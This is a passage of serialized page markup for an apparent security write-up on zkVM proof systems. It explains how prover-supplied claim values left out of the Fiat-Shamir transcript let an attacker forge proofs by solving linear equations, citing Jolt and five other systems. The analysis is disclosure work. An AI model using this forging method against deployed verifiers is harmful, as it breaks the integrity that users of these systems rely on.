"className":116880},[246],[116882,117006],{"type":26,"tag":137,"props":116883,"children":116885},{"className":116884,"style":116154},[251],[116886,116975,116986],{"type":26,"tag":137,"props":116887,"children":116888},{"style":116158},[116889,116893],{"type":26,"tag":137,"props":116890,"children":116892},{"className":116891,"style":114789},[261],[],{"type":26,"tag":137,"props":116894,"children":116896},{"className":116895},[267,268,269,270],[116897],{"type":26,"tag":137,"props":116898,"children":116900},{"className":116899},[169,270],[116901,116906,116911],{"type":26,"tag":137,"props":116902,"children":116904},{"className":116903,"style":2321},[169,170,270],[116905],{"type":32,"value":2324},{"type":26,"tag":137,"props":116907,"children":116909},{"className":116908},[353,270],[116910],{"type":32,"value":1935},{"type":26,"tag":137,"props":116912,"children":116914},{"className":116913},[169,270],[116915,116924],{"type":26,"tag":137,"props":116916,"children":116918},{"className":116917},[169,32,270],[116919],{"type":26,"tag":137,"props":116920,"children":116922},{"className":116921},[169,270],[116923],{"type":32,"value":64608},{"type":26,"tag":137,"props":116925,"children":116927},{"className":116926},[236],[116928],{"type":26,"tag":137,"props":116929,"children":116931},{"className":116930},[241,417],[116932,116963],{"type":26,"tag":137,"props":116933,"children":116935},{"className":116934},[246],[116936,116958],{"type":26,"tag":137,"props":116937,"children":116940},{"className":116938,"style":116939},[251],"height:0.3281em;",[116941],{"type":26,"tag":137,"props":116942,"children":116944},{"style":116943},"top:-2.357em;margin-right:0.0714em;",[116945,116949],{"type":26,"tag":137,"props":116946,"children":116948},{"className":116947,"style":111483},[261],[],{"type":26,"tag":137,"props":116950,"children":116952},{"className":116951},[267,111488,111489,270],[116953],{"type":26,"tag":137,"props":116954,"children":116956},{"className":116955,"style":116838},[169,170,270],[116957],{"type":32,"value":11242},{"type":26,"tag":137,"props":116959,"children":116961},{"className":116960},[453],[116962],{"type":32,"value":456},{"type":26,"tag":137,"props":116964,"children":116966},{"className":116965},[246],[116967],{"type":26,"tag":137,"props":116968,"children":116971},{"className":116969,"style":116970},[251],"height:0.2819em;",[116972],{"type":26,"tag":137,"props":116973,"children":116974},{},[],{"type":26,"tag":137,"props":116976,"children":116977},{"style":116189},[116978,116982],{"type":26,"tag":137,"props":116979,"children":116981},{"className":116980,"style":114789},[261],[],{"type":26,"tag":137,"props":116983,"children":116985},{"className":116984,"style":116199},[116198],[],{"type":26,"tag":137,"props":116987,"children":116988},{"style":116203},[116989,116993],{"type":26,"tag":137,"props":116990,"children":116992},{"className":116991,"style":114789},[261],[],{"type":26,"tag":137,"props":116994,"children":116996},{"className":116995},[267,268,269,270],[116997],{"type":26,"tag":137,"props":116998,"children":117000},{"className":116999},[169,270],[117001],{"type":26,"tag":137,"props":117002,"children":117004},{"className":117003},[169,270],[117005],{"type":32,"value":878},{"type":26,"tag":137,"props":117007,"children":117009},{"className":117008},[453],[117010],{"type":32,"value":456},{"type":26,"tag":137,"props":117012,"children":117014},{"className":117013},[246],[117015],{"type":26,"tag":137,"props":117016,"children":117019},{"className":117017,"style":117018},[251],"height:0.5423em;",[117020],{"type":26,"tag":137,"props":117021,"children":117022},{},[],{"type":26,"tag":137,"props":117024,"children":117026},{"className":117025},[197,116136],[],{"type":26,"tag":137,"props":117028,"children":117030},{"className":117029,"style":348},[184],[],{"type":26,"tag":137,"props":117032,"children":117034},{"className":117033},[353],[117035],{"type":32,"value":1935},{"type":26,"tag":137,"props":117037,"children":117039},{"className":117038,"style":348},[184],[],{"type":26,"tag":137,"props":117041,"children":117043},{"className":117042},[151],[117044,117049,117107,117111],{"type":26,"tag":137,"props":117045,"children":117048},{"className":117046,"style":117047},[156],"height:1.296em;vertical-align:-0.4509em;",[],{"type":26,"tag":137,"props":117050,"children":117052},{"className":117051},[3722],[117053,117058],{"type":26,"tag":137,"props":117054,"children":117056},{"className":117055,"style":3725},[3722,3723,3724],[117057],{"type":32,"value":3728},{"type":26,"tag":137,"props":117059,"children":117061},{"className":117060},[236],[117062],{"type":26,"tag":137,"props":117063,"children":117065},{"className":117064},[241,417],[117066,117095],{"type":26,"tag":137,"props":117067,"children":117069},{"className":117068},[246],[117070,117090],{"type":26,"tag":137,"props":117071,"children":117073},{"className":117072,"style":116288},[251],[117074],{"type":26,"tag":137,"props":117075,"children":117076},{"style":24239},[117077,117081],{"type":26,"tag":137,"props":117078,"children":117080},{"className":117079,"style":262},[261],[],{"type":26,"tag":137,"props":117082,"children":117084},{"className":117083},[267,268,269,270],[117085],{"type":26,"tag":137,"props":117086,"children":117088},{"className":117087,"style":97062},[169,170,270],[117089],{"type":32,"value":91286},{"type":26,"tag":137,"props":117091,"children":117093},{"className":117092},[453],[117094],{"type":32,"value":456},{"type":26,"tag":137,"props":117096,"children":117098},{"className":117097},[246],[117099],{"type":26,"tag":137,"props":117100,"children":117103},{"className":117101,"style":117102},[251],"height:0.2997em;",[117104],{"type":26,"tag":137,"props":117105,"children":117106},{},[],{"type":26,"tag":137,"props":117108,"children":117110},{"className":117109,"style":185},[184],[],{"type":26,"tag":137,"props":117112,"children":117114},{"className":117113},[169],[117115,117119,117272],{"type":26,"tag":137,"props":117116,"children":117118},{"className":117117},[162,116136],[],{"type":26,"tag":137,"props":117120,"children":117122},{"className":117121},[116141],[117123],{"type":26,"tag":137,"props":117124,"children":117126},{"className":117125},[241,417],[117127,117260],{"type":26,"tag":137,"props":117128,"children":117130},{"className":117129},[246],[117131,117255],{"type":26,"tag":137,"props":117132,"children":117134},{"className":117133,"style":116154},[251],[117135,117224,117235],{"type":26,"tag":137,"props":117136,"children":117137},{"style":116158},[117138,117142],{"type":26,"tag":137,"props":117139,"children":117141},{"className":117140,"style":114789},[261],[],{"type":26,"tag":137,"props":117143,"children":117145},{"className":117144},[267,268,269,270],[117146],{"type":26,"tag":137,"props":117147,"children":117149},{"className":117148},[169,270],[117150,117155,117160],{"type":26,"tag":137,"props":117151,"children":117153},{"className":117152,"style":2321},[169,170,270],[117154],{"type":32,"value":2324},{"type":26,"tag":137,"props":117156,"children":117158},{"className":117157},[353,270],[117159],{"type":32,"value":1935},{"type":26,"tag":137,"props":117161,"children":117163},{"className":117162},[169,270],[117164,117174],{"type":26,"tag":137,"props":117165,"children":117167},{"className":117166},[169,32,270],[117168],{"type":26,"tag":137,"props":117169,"children":117171},{"className":117170},[169,270],[117172],{"type":32,"value":117173},"consume",{"type":26,"tag":137,"props":117175,"children":117177},{"className":117176},[236],[117178],{"type":26,"tag":137,"props":117179,"children":117181},{"className":117180},[241,417],[117182,117212],{"type":26,"tag":137,"props":117183,"children":117185},{"className":117184},[246],[117186,117207],{"type":26,"tag":137,"props":117187,"children":117189},{"className":117188,"style":114950},[251],[117190],{"type":26,"tag":137,"props":117191,"children":117193},{"style":117192},"top:-2.3488em;margin-right:0.0714em;",[117194,117198],{"type":26,"tag":137,"props":117195,"children":117197},{"className":117196,"style":111483},[261],[],{"type":26,"tag":137,"props":117199,"children":117201},{"className":117200},[267,111488,111489,270],[117202],{"type":26,"tag":137,"props":117203,"children":117205},{"className":117204,"style":97062},[169,170,270],[117206],{"type":32,"value":91286},{"type":26,"tag":137,"props":117208,"children":117210},{"className":117209},[453],[117211],{"type":32,"value":456},{"type":26,"tag":137,"props":117213,"children":117215},{"className":117214},[246],[117216],{"type":26,"tag":137,"props":117217,"children":117220},{"className":117218,"style":117219},[251],"height:0.1512em;",[117221],{"type":26,"tag":137,"props":117222,"children":117223},{},[],{"type":26,"tag":137,"props":117225,"children":117226},{"style":116189},[117227,117231],{"type":26,"tag":137,"props":117228,"children":117230},{"className":117229,"style":114789},[261],[],{"type":26,"tag":137,"props":117232,"children":117234},{"className":117233,"style":116199},[116198],[],{"type":26,"tag":137,"props":117236,"children":117237},{"style":116203},[117238,117242],{"type":26,"tag":137,"props":117239,"children":117241},{"className":117240,"style":114789},[261],[],{"type":26,"tag":137,"props":117243,"children":117245},{"className":117244},[267,268,269,270],[117246],{"type":26,"tag":137,"props":117247,"children":117249},{"className":117248},[169,270],[117250],{"type":26,"tag":137,"props":117251,"children":117253},{"className":117252},[169,270],[117254],{"type":32,"value":878},{"type":26,"tag":137,"props":117256,"children":117258},{"className":117257},[453],[117259],{"type":32,"value":456},{"type":26,"tag":137,"props":117261,"children":117263},{"className":117262},[246],[117264],{"type":26,"tag":137,"props":117265,"children":117268},{"className":117266,"style":117267},[251],"height:0.4509em;",[117269],{"type":26,"tag":137,"props":117270,"children":117271},{},[],{"type":26,"tag":137,"props":117273,"children":117275},{"className":117274},[197,116136],[],{"type":26,"tag":35,"props":117277,"children":117278},{},[117279,117281,117463],{"type":32,"value":117280},"The global check: ",{"type":26,"tag":130,"props":117282,"children":117284},{"className":117283},[133,134],[117285],{"type":26,"tag":137,"props":117286,"children":117288},{"className":117287},[140],[117289],{"type":26,"tag":137,"props":117290,"children":117292},{"className":117291,"ariaHidden":146},[145],[117293,117450],{"type":26,"tag":137,"props":117294,"children":117296},{"className":117295},[151],[117297,117301,117358,117362,117371,117376,117437,117441,117446],{"type":26,"tag":137,"props":117298,"children":117300},{"className":117299,"style":95590},[156],[],{"type":26,"tag":137,"props":117302,"children":117304},{"className":117303},[3722],[117305,117310],{"type":26,"tag":137,"props":117306,"children":117308},{"className":117307,"style":3725},[3722,3723,3724],[117309],{"type":32,"value":3728},{"type":26,"tag":137,"props":117311,"children":117313},{"className":117312},[236],[117314],{"type":26,"tag":137,"props":117315,"children":117317},{"className":117316},[241,417],[117318,117347],{"type":26,"tag":137,"props":117319,"children":117321},{"className":117320},[246],[117322,117342],{"type":26,"tag":137,"props":117323,"children":117325},{"className":117324,"style":116822},[251],[117326],{"type":26,"tag":137,"props":117327,"children":117328},{"style":24239},[117329,117333],{"type":26,"tag":137,"props":117330,"children":117332},{"className":117331,"style":262},[261],[],{"type":26,"tag":137,"props":117334,"children":117336},{"className":117335},[267,268,269,270],[117337],{"type":26,"tag":137,"props":117338,"children":117340},{"className":117339},[169,170,270],[117341],{"type":32,"value":506},{"type":26,"tag":137,"props":117343,"children":117345},{"className":117344},[453],[117346],{"type":32,"value":456},{"type":26,"tag":137,"props":117348,"children":117350},{"className":117349},[246],[117351],{"type":26,"tag":137,"props":117352,"children":117354},{"className":117353,"style":117102},[251],[117355],{"type":26,"tag":137,"props":117356,"children":117357},{},[],{"type":26,"tag":137,"props":117359,"children":117361},{"className":117360,"style":185},[184],[],{"type":26,"tag":137,"props":117363,"children":117365},{"className":117364},[169,32],[117366],{"type":26,"tag":137,"props":117367,"children":117369},{"className":117368},[169],[117370],{"type":32,"value":116708},{"type":26,"tag":137,"props":117372,"children":117374},{"className":117373,"style":621},[169],[117375],{"type":32,"value":5666},{"type":26,"tag":137,"props":117377,"children":117379},{"className":117378},[169],[117380,117389],{"type":26,"tag":137,"props":117381,"children":117383},{"className":117382},[169,32],[117384],{"type":26,"tag":137,"props":117385,"children":117387},{"className":117386},[169],[117388],{"type":32,"value":79235},{"type":26,"tag":137,"props":117390,"children":117392},{"className":117391},[236],[117393],{"type":26,"tag":137,"props":117394,"children":117396},{"className":117395},[241,417],[117397,117426],{"type":26,"tag":137,"props":117398,"children":117400},{"className":117399},[246],[117401,117421],{"type":26,"tag":137,"props":117402,"children":117404},{"className":117403,"style":556},[251],[117405],{"type":26,"tag":137,"props":117406,"children":117407},{"style":116745},[117408,117412],{"type":26,"tag":137,"props":117409,"children":117411},{"className":117410,"style":262},[261],[],{"type":26,"tag":137,"props":117413,"children":117415},{"className":117414},[267,268,269,270],[117416],{"type":26,"tag":137,"props":117417,"children":117419},{"className":117418},[169,170,270],[117420],{"type":32,"value":506},{"type":26,"tag":137,"props":117422,"children":117424},{"className":117423},[453],[117425],{"type":32,"value":456},{"type":26,"tag":137,"props":117427,"children":117429},{"className":117428},[246],[117430],{"type":26,"tag":137,"props":117431,"children":117433},{"className":117432,"style":464},[251],[117434],{"type":26,"tag":137,"props":117435,"children":117436},{},[],{"type":26,"tag":137,"props":117438,"children":117440},{"className":117439,"style":281},[184],[],{"type":26,"tag":137,"props":117442,"children":117444},{"className":117443},[286],[117445],{"type":32,"value":289},{"type":26,"tag":137,"props":117447,"children":117449},{"className":117448,"style":281},[184],[],{"type":26,"tag":137,"props":117451,"children":117453},{"className":117452},[151],[117454,117458],{"type":26,"tag":137,"props":117455,"children":117457},{"className":117456,"style":368},[156],[],{"type":26,"tag":137,"props":117459,"children":117461},{"className":117460},[169],[117462],{"type":32,"value":1817},{"type":32,"value":470},{"type":26,"tag":35,"props":117465,"children":117466},{},[117467,117472,117474,117480],{"type":26,"tag":84,"props":117468,"children":117469},{},[117470],{"type":32,"value":117471},"Why this is vulnerable:",{"type":32,"value":117473}," The ",{"type":26,"tag":130,"props":117475,"children":117477},{"className":117476},[],[117478],{"type":32,"value":117479},"claimed_sum",{"type":32,"value":117481}," values are prover-supplied. If they're not in the transcript before challenges are derived, the prover can adjust them to make the sum zero for an invalid execution.",{"type":26,"tag":3265,"props":117483,"children":117484},{},[],{"type":26,"tag":92,"props":117486,"children":117488},{"id":117487},"the-universal-attack-pattern",[117489],{"type":32,"value":117490},"The Universal Attack Pattern",{"type":26,"tag":35,"props":117492,"children":117493},{},[117494],{"type":32,"value":117495},"Now we can describe the attack pattern that works on all six systems:",{"type":26,"tag":35,"props":117497,"children":117498},{},[117499],{"type":26,"tag":2210,"props":117500,"children":117503},{"alt":117501,"src":117502},"2_attack_pattern","/posts/zkvms-unfaithful-claims/2_attack_pattern.svg",[],{"type":26,"tag":35,"props":117505,"children":117506},{},[117507,117509,117534],{"type":32,"value":117508},"When a value ",{"type":26,"tag":130,"props":117510,"children":117512},{"className":117511},[133,134],[117513],{"type":26,"tag":137,"props":117514,"children":117516},{"className":117515},[140],[117517],{"type":26,"tag":137,"props":117518,"children":117520},{"className":117519,"ariaHidden":146},[145],[117521],{"type":26,"tag":137,"props":117522,"children":117524},{"className":117523},[151],[117525,117529],{"type":26,"tag":137,"props":117526,"children":117528},{"className":117527,"style":1512},[156],[],{"type":26,"tag":137,"props":117530,"children":117532},{"className":117531,"style":110823},[169,170],[117533],{"type":32,"value":111147},{"type":32,"value":117535}," isn't transcript-bound:",{"type":26,"tag":4820,"props":117537,"children":117538},{},[117539,117570,117647,117791],{"type":26,"tag":3430,"props":117540,"children":117541},{},[117542,117544,117569],{"type":32,"value":117543},"Challenges are fixed (independent of ",{"type":26,"tag":130,"props":117545,"children":117547},{"className":117546},[133,134],[117548],{"type":26,"tag":137,"props":117549,"children":117551},{"className":117550},[140],[117552],{"type":26,"tag":137,"props":117553,"children":117555},{"className":117554,"ariaHidden":146},[145],[117556],{"type":26,"tag":137,"props":117557,"children":117559},{"className":117558},[151],[117560,117564],{"type":26,"tag":137,"props":117561,"children":117563},{"className":117562,"style":1512},[156],[],{"type":26,"tag":137,"props":117565,"children":117567},{"className":117566,"style":110823},[169,170],[117568],{"type":32,"value":111147},{"type":32,"value":200},{"type":26,"tag":3430,"props":117571,"children":117572},{},[117573,117575],{"type":32,"value":117574},"The verification equation has form: ",{"type":26,"tag":130,"props":117576,"children":117578},{"className":117577},[133,134],[117579],{"type":26,"tag":137,"props":117580,"children":117582},{"className":117581},[140],[117583],{"type":26,"tag":137,"props":117584,"children":117586},{"className":117585,"ariaHidden":146},[145],[117587,117628],{"type":26,"tag":137,"props":117588,"children":117590},{"className":117589},[151],[117591,117595,117600,117605,117610,117615,117619,117624],{"type":26,"tag":137,"props":117592,"children":117594},{"className":117593,"style":157},[156],[],{"type":26,"tag":137,"props":117596,"children":117598},{"className":117597,"style":1039},[169,170],[117599],{"type":32,"value":1042},{"type":26,"tag":137,"props":117601,"children":117603},{"className":117602},[162],[117604],{"type":32,"value":165},{"type":26,"tag":137,"props":117606,"children":117608},{"className":117607,"style":110823},[169,170],[117609],{"type":32,"value":111147},{"type":26,"tag":137,"props":117611,"children":117613},{"className":117612},[197],[117614],{"type":32,"value":200},{"type":26,"tag":137,"props":117616,"children":117618},{"className":117617,"style":281},[184],[],{"type":26,"tag":137,"props":117620,"children":117622},{"className":117621},[286],[117623],{"type":32,"value":289},{"type":26,"tag":137,"props":117625,"children":117627},{"className":117626,"style":281},[184],[],{"type":26,"tag":137,"props":117629,"children":117631},{"className":117630},[151],[117632,117637],{"type":26,"tag":137,"props":117633,"children":117636},{"className":117634,"style":117635},[156],"height:0.8095em;vertical-align:-0.1944em;",[],{"type":26,"tag":137,"props":117638,"children":117640},{"className":117639},[169,32],[117641],{"type":26,"tag":137,"props":117642,"children":117644},{"className":117643},[169],[117645],{"type":32,"value":117646},"target",{"type":26,"tag":3430,"props":117648,"children":117649},{},[117650,117651,117676,117678],{"type":32,"value":10064},{"type":26,"tag":130,"props":117652,"children":117654},{"className":117653},[133,134],[117655],{"type":26,"tag":137,"props":117656,"children":117658},{"className":117657},[140],[117659],{"type":26,"tag":137,"props":117660,"children":117662},{"className":117661,"ariaHidden":146},[145],[117663],{"type":26,"tag":137,"props":117664,"children":117666},{"className":117665},[151],[117667,117671],{"type":26,"tag":137,"props":117668,"children":117670},{"className":117669,"style":3835},[156],[],{"type":26,"tag":137,"props":117672,"children":117674},{"className":117673,"style":1039},[169,170],[117675],{"type":32,"value":1042},{"type":32,"value":117677}," is linear: ",{"type":26,"tag":130,"props":117679,"children":117681},{"className":117680},[133,134],[117682],{"type":26,"tag":137,"props":117683,"children":117685},{"className":117684},[140],[117686],{"type":26,"tag":137,"props":117687,"children":117689},{"className":117688,"ariaHidden":146},[145],[117690,117719,117746,117774],{"type":26,"tag":137,"props":117691,"children":117693},{"className":117692},[151],[117694,117699,117706,117710,117715],{"type":26,"tag":137,"props":117695,"children":117698},{"className":117696,"style":117697},[156],"height:0.4445em;",[],{"type":26,"tag":137,"props":117700,"children":117703},{"className":117701,"style":117702},[169,170],"margin-right:0.0037em;",[117704],{"type":32,"value":117705},"α",{"type":26,"tag":137,"props":117707,"children":117709},{"className":117708,"style":348},[184],[],{"type":26,"tag":137,"props":117711,"children":117713},{"className":117712},[353],[117714],{"type":32,"value":2172},{"type":26,"tag":137,"props":117716,"children":117718},{"className":117717,"style":348},[184],[],{"type":26,"tag":137,"props":117720,"children":117722},{"className":117721},[151],[117723,117728,117733,117737,117742],{"type":26,"tag":137,"props":117724,"children":117727},{"className":117725,"style":117726},[156],"height:0.7667em;vertical-align:-0.0833em;",[],{"type":26,"tag":137,"props":117729,"children":117731},{"className":117730,"style":110823},[169,170],[117732],{"type":32,"value":111147},{"type":26,"tag":137,"props":117734,"children":117736},{"className":117735,"style":348},[184],[],{"type":26,"tag":137,"props":117738,"children":117740},{"className":117739},[353],[117741],{"type":32,"value":356},{"type":26,"tag":137,"props":117743,"children":117745},{"className":117744,"style":348},[184],[],{"type":26,"tag":137,"props":117747,"children":117749},{"className":117748},[151],[117750,117754,117761,117765,117770],{"type":26,"tag":137,"props":117751,"children":117753},{"className":117752,"style":3835},[156],[],{"type":26,"tag":137,"props":117755,"children":117758},{"className":117756,"style":117757},[169,170],"margin-right:0.05278em;",[117759],{"type":32,"value":117760},"β",{"type":26,"tag":137,"props":117762,"children":117764},{"className":117763,"style":281},[184],[],{"type":26,"tag":137,"props":117766,"children":117768},{"className":117767},[286],[117769],{"type":32,"value":289},{"type":26,"tag":137,"props":117771,"children":117773},{"className":117772,"style":281},[184],[],{"type":26,"tag":137,"props":117775,"children":117777},{"className":117776},[151],[117778,117782],{"type":26,"tag":137,"props":117779,"children":117781},{"className":117780,"style":117635},[156],[],{"type":26,"tag":137,"props":117783,"children":117785},{"className":117784},[169,32],[117786],{"type":26,"tag":137,"props":117787,"children":117789},{"className":117788},[169],[117790],{"type":32,"value":117646},{"type":26,"tag":3430,"props":117792,"children":117793},{},[117794,117796],{"type":32,"value":117795},"Solve: ",{"type":26,"tag":130,"props":117797,"children":117799},{"className":117798},[133,134],[117800],{"type":26,"tag":137,"props":117801,"children":117803},{"className":117802},[140],[117804],{"type":26,"tag":137,"props":117805,"children":117807},{"className":117806,"ariaHidden":146},[145],[117808,117834,117869],{"type":26,"tag":137,"props":117809,"children":117811},{"className":117810},[151],[117812,117816,117821,117825,117830],{"type":26,"tag":137,"props":117813,"children":117815},{"className":117814,"style":1512},[156],[],{"type":26,"tag":137,"props":117817,"children":117819},{"className":117818,"style":110823},[169,170],[117820],{"type":32,"value":111147},{"type":26,"tag":137,"props":117822,"children":117824},{"className":117823,"style":281},[184],[],{"type":26,"tag":137,"props":117826,"children":117828},{"className":117827},[286],[117829],{"type":32,"value":289},{"type":26,"tag":137,"props":117831,"children":117833},{"className":117832,"style":281},[184],[],{"type":26,"tag":137,"props":117835,"children":117837},{"className":117836},[151],[117838,117842,117847,117856,117860,117865],{"type":26,"tag":137,"props":117839,"children":117841},{"className":117840,"style":157},[156],[],{"type":26,"tag":137,"props":117843,"children":117845},{"className":117844},[162],[117846],{"type":32,"value":165},{"type":26,"tag":137,"props":117848,"children":117850},{"className":117849},[169,32],[117851],{"type":26,"tag":137,"props":117852,"children":117854},{"className":117853},[169],[117855],{"type":32,"value":117646},{"type":26,"tag":137,"props":117857,"children":117859},{"className":117858,"style":348},[184],[],{"type":26,"tag":137,"props":117861,"children":117863},{"className":117862},[353],[117864],{"type":32,"value":1935},{"type":26,"tag":137,"props":117866,"children":117868},{"className":117867,"style":348},[184],[],{"type":26,"tag":137,"props":117870,"children":117872},{"className":117871},[151],[117873,117877,117882,117887,117892],{"type":26,"tag":137,"props":117874,"children":117876},{"className":117875,"style":157},[156],[],{"type":26,"tag":137,"props":117878,"children":117880},{"className":117879,"style":117757},[169,170],[117881],{"type":32,"value":117760},{"type":26,"tag":137,"props":117883,"children":117885},{"className":117884},[197],[117886],{"type":32,"value":200},{"type":26,"tag":137,"props":117888,"children":117890},{"className":117889},[169],[117891],{"type":32,"value":7162},{"type":26,"tag":137,"props":117893,"children":117895},{"className":117894,"style":117702},[169,170],[117896],{"type":32,"value":117705},{"type":26,"tag":35,"props":117898,"children":117899},{},[117900],{"type":32,"value":117901},"In the simplest linear case, forging reduces to solving a low-dimensional field equation, while other systems require small coupled systems.",{"type":26,"tag":35,"props":117903,"children":117904},{},[117905,117907,117983],{"type":32,"value":117906},"For systems with multiple unbound values, we get a system of linear equations. Gaussian elimination solves it in ",{"type":26,"tag":130,"props":117908,"children":117910},{"className":117909},[133,134],[117911],{"type":26,"tag":137,"props":117912,"children":117914},{"className":117913},[140],[117915],{"type":26,"tag":137,"props":117916,"children":117918},{"className":117917,"ariaHidden":146},[145],[117919],{"type":26,"tag":137,"props":117920,"children":117922},{"className":117921},[151],[117923,117927,117932,117937,117978],{"type":26,"tag":137,"props":117924,"children":117926},{"className":117925,"style":3891},[156],[],{"type":26,"tag":137,"props":117928,"children":117930},{"className":117929,"style":621},[169,170],[117931],{"type":32,"value":1265},{"type":26,"tag":137,"props":117933,"children":117935},{"className":117934},[162],[117936],{"type":32,"value":165},{"type":26,"tag":137,"props":117938,"children":117940},{"className":117939},[169],[117941,117946],{"type":26,"tag":137,"props":117942,"children":117944},{"className":117943},[169,170],[117945],{"type":32,"value":1549},{"type":26,"tag":137,"props":117947,"children":117949},{"className":117948},[236],[117950],{"type":26,"tag":137,"props":117951,"children":117953},{"className":117952},[241],[117954],{"type":26,"tag":137,"props":117955,"children":117957},{"className":117956},[246],[117958],{"type":26,"tag":137,"props":117959,"children":117961},{"className":117960,"style":252},[251],[117962],{"type":26,"tag":137,"props":117963,"children":117964},{"style":256},[117965,117969],{"type":26,"tag":137,"props":117966,"children":117968},{"className":117967,"style":262},[261],[],{"type":26,"tag":137,"props":117970,"children":117972},{"className":117971},[267,268,269,270],[117973],{"type":26,"tag":137,"props":117974,"children":117976},{"className":117975},[169,270],[117977],{"type":32,"value":344},{"type":26,"tag":137,"props":117979,"children":117981},{"className":117980},[197],[117982],{"type":32,"value":200},{"type":32,"value":117984}," field operations. For non-linear constraints, we might need to use some more advanced techniques like resultants and Groebner bases.",{"type":26,"tag":3265,"props":117986,"children":117987},{},[],{"type":26,"tag":92,"props":117989,"children":117991},{"id":117990},"the-six-broken-systems",[117992],{"type":32,"value":117993},"The Six Broken Systems",{"type":26,"tag":35,"props":117995,"children":117996},{},[117997],{"type":26,"tag":2210,"props":117998,"children":118001},{"alt":117999,"src":118000},"3_six_broken_systems","/posts/zkvms-unfaithful-claims/3_six_broken_systems.svg",[],{"type":26,"tag":35,"props":118003,"children":118004},{},[118005],{"type":32,"value":118006},"Now let's see how this plays out in each system. We'll go deep on the first one (Jolt) to establish the pattern, then focus on what's unique about each subsequent system.",{"type":26,"tag":3265,"props":118008,"children":118009},{},[],{"type":26,"tag":118,"props":118011,"children":118013},{"id":118012},"jolt-a16z",[118014],{"type":32,"value":118015},"Jolt (a16z)",{"type":26,"tag":35,"props":118017,"children":118018},{},[118019],{"type":32,"value":118020},"Jolt is a zkVM for RISC-V programs, built by a16z. It uses sumcheck extensively to verify execution constraints.",{"type":26,"tag":35,"props":118022,"children":118023},{},[118024],{"type":26,"tag":84,"props":118025,"children":118026},{},[118027],{"type":32,"value":118028},"The proof structure:",{"type":26,"tag":5512,"props":118030,"children":118032},{"code":118031},"JoltProof {\n    commitments: Vec\u003CCommitment>,           // Polynomial commitments to trace\n    opening_claims: Map\u003COpeningId, Claim>,  // \u003C- THE VULNERABLE VALUES\n    proofs: Map\u003CStage, SumcheckProof>,      // Sumcheck and opening proofs\n    ...\n}\n",[118033],{"type":26,"tag":130,"props":118034,"children":118035},{"__ignoreMap":7},[118036],{"type":32,"value":118031},{"type":26,"tag":35,"props":118038,"children":118039},{},[118040],{"type":26,"tag":84,"props":118041,"children":118042},{},[118043],{"type":32,"value":118044},"The verification flow:",{"type":26,"tag":35,"props":118046,"children":118047},{},[118048],{"type":26,"tag":2210,"props":118049,"children":118052},{"alt":118050,"src":118051},"4_jolt_verification_flow","/posts/zkvms-unfaithful-claims/4_jolt_verification_flow.svg",[],{"type":26,"tag":35,"props":118054,"children":118055},{},[118056,118061,118063,118069,118071,118077,118079,118084],{"type":26,"tag":84,"props":118057,"children":118058},{},[118059],{"type":32,"value":118060},"The bug:",{"type":32,"value":118062}," Each sumcheck instance provides an ",{"type":26,"tag":130,"props":118064,"children":118066},{"className":118065},[],[118067],{"type":32,"value":118068},"input_claim",{"type":32,"value":118070},", which is the value the polynomial allegedly sums to over the Boolean hypercube. These claims come from ",{"type":26,"tag":130,"props":118072,"children":118074},{"className":118073},[],[118075],{"type":32,"value":118076},"opening_claims",{"type":32,"value":118078}," in the proof, but they were ",{"type":26,"tag":84,"props":118080,"children":118081},{},[118082],{"type":32,"value":118083},"never absorbed into the transcript",{"type":32,"value":118085}," before the batching coefficients were derived.",{"type":26,"tag":35,"props":118087,"children":118088},{},[118089],{"type":26,"tag":2210,"props":118090,"children":118093},{"alt":118091,"src":118092},"5_jolt_flow","/posts/zkvms-unfaithful-claims/5_jolt_flow.svg",[],{"type":26,"tag":35,"props":118095,"children":118096},{},[118097],{"type":26,"tag":84,"props":118098,"children":118099},{},[118100],{"type":32,"value":118101},"How sumcheck uses opening_claims:",{"type":26,"tag":35,"props":118103,"children":118104},{},[118105,118107,118113,118115,118192],{"type":32,"value":118106},"In Jolt's batched sumcheck, the verifier computes a target value ",{"type":26,"tag":130,"props":118108,"children":118110},{"className":118109},[],[118111],{"type":32,"value":118112},"BatchedClaim",{"type":32,"value":118114}," by taking a random linear combination of the individual claims ",{"type":26,"tag":130,"props":118116,"children":118118},{"className":118117},[133,134],[118119],{"type":26,"tag":137,"props":118120,"children":118122},{"className":118121},[140],[118123],{"type":26,"tag":137,"props":118124,"children":118126},{"className":118125,"ariaHidden":146},[145],[118127],{"type":26,"tag":137,"props":118128,"children":118130},{"className":118129},[151],[118131,118135],{"type":26,"tag":137,"props":118132,"children":118134},{"className":118133,"style":113616},[156],[],{"type":26,"tag":137,"props":118136,"children":118138},{"className":118137},[169],[118139,118144],{"type":26,"tag":137,"props":118140,"children":118142},{"className":118141,"style":1517},[169,170],[118143],{"type":32,"value":1520},{"type":26,"tag":137,"props":118145,"children":118147},{"className":118146},[236],[118148],{"type":26,"tag":137,"props":118149,"children":118151},{"className":118150},[241,417],[118152,118181],{"type":26,"tag":137,"props":118153,"children":118155},{"className":118154},[246],[118156,118176],{"type":26,"tag":137,"props":118157,"children":118159},{"className":118158,"style":556},[251],[118160],{"type":26,"tag":137,"props":118161,"children":118162},{"style":113049},[118163,118167],{"type":26,"tag":137,"props":118164,"children":118166},{"className":118165,"style":262},[261],[],{"type":26,"tag":137,"props":118168,"children":118170},{"className":118169},[267,268,269,270],[118171],{"type":26,"tag":137,"props":118172,"children":118174},{"className":118173},[169,170,270],[118175],{"type":32,"value":506},{"type":26,"tag":137,"props":118177,"children":118179},{"className":118178},[453],[118180],{"type":32,"value":456},{"type":26,"tag":137,"props":118182,"children":118184},{"className":118183},[246],[118185],{"type":26,"tag":137,"props":118186,"children":118188},{"className":118187,"style":464},[251],[118189],{"type":26,"tag":137,"props":118190,"children":118191},{},[],{"type":32,"value":7072},{"type":26,"tag":35,"props":118194,"children":118195},{},[118196],{"type":26,"tag":130,"props":118197,"children":118199},{"className":118198},[133,134],[118200],{"type":26,"tag":137,"props":118201,"children":118203},{"className":118202},[140],[118204],{"type":26,"tag":137,"props":118205,"children":118207},{"className":118206,"ariaHidden":146},[145],[118208,118238,118379],{"type":26,"tag":137,"props":118209,"children":118211},{"className":118210},[151],[118212,118216,118225,118229,118234],{"type":26,"tag":137,"props":118213,"children":118215},{"className":118214,"style":95563},[156],[],{"type":26,"tag":137,"props":118217,"children":118219},{"className":118218},[169,32],[118220],{"type":26,"tag":137,"props":118221,"children":118223},{"className":118222},[169],[118224],{"type":32,"value":118112},{"type":26,"tag":137,"props":118226,"children":118228},{"className":118227,"style":281},[184],[],{"type":26,"tag":137,"props":118230,"children":118232},{"className":118231},[286],